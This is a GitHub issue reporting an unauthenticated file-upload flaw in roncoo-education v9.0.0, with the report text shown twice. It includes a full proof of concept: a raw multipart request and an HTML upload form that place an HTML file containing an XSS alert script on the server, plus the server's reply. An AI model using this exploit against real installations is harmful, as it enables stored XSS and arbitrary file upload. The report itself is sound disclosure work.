Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[Suggested description]
File upload vulnerability in roncoo education. Because the identity is not authenticated in the uploadpic upload method of apiuploadcontroller, and the user is allowed to define the file suffix.
[Vulnerability Type]
File upload vulnerability
[Vendor of Product]
https://github.com/roncoo/roncoo-education
[Affected Product Code Base]
v9.0.0-RELEASE
[Affected Component]
POST /course/api/upload/pic HTTP/1.1 Host: localhost Connection: close Content-Length: 480 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxOJxWZtarWTvGvWD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 ------WebKitFormBoundaryxOJxWZtarWTvGvWD Content-Disposition: form-data; name="picFile"; filename="test.html" Content-Type: image/jpeg <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> </head> <body> <script>alert('xss');</script> </body> </html> ------WebKitFormBoundaryxOJxWZtarWTvGvWD--
[Vulnerability proof]
Use the following HTML file to initiate the upload request
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> </head> <body> <form action="https://localhost/course/api/upload/pic" method="post", enctype="multipart/form-data"> <input type="file" name="picFile" /> <input type="submit" value="上传" /> </form> </body> </html>
Upload any file, here my file source code is
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> </head> <body> <script>alert('xss');</script> </body> </html>
The server returns the following data
{"code":200,"msg":"","data":"http://localhost/course/e89eadfcd465481d8ca7075e8e00c412.html"}
[Defective code]
The text was updated successfully, but these errors were encountered:
No branches or pull requests
[Suggested description]
File upload vulnerability in roncoo education. Because the identity is not authenticated in the uploadpic upload method of apiuploadcontroller, and the user is allowed to define the file suffix.
[Vulnerability Type]
File upload vulnerability
[Vendor of Product]
https://github.com/roncoo/roncoo-education
[Affected Product Code Base]
v9.0.0-RELEASE
[Affected Component]
[Vulnerability proof]
Use the following HTML file to initiate the upload request
Upload any file, here my file source code is
The server returns the following data
[Defective code]
The text was updated successfully, but these errors were encountered: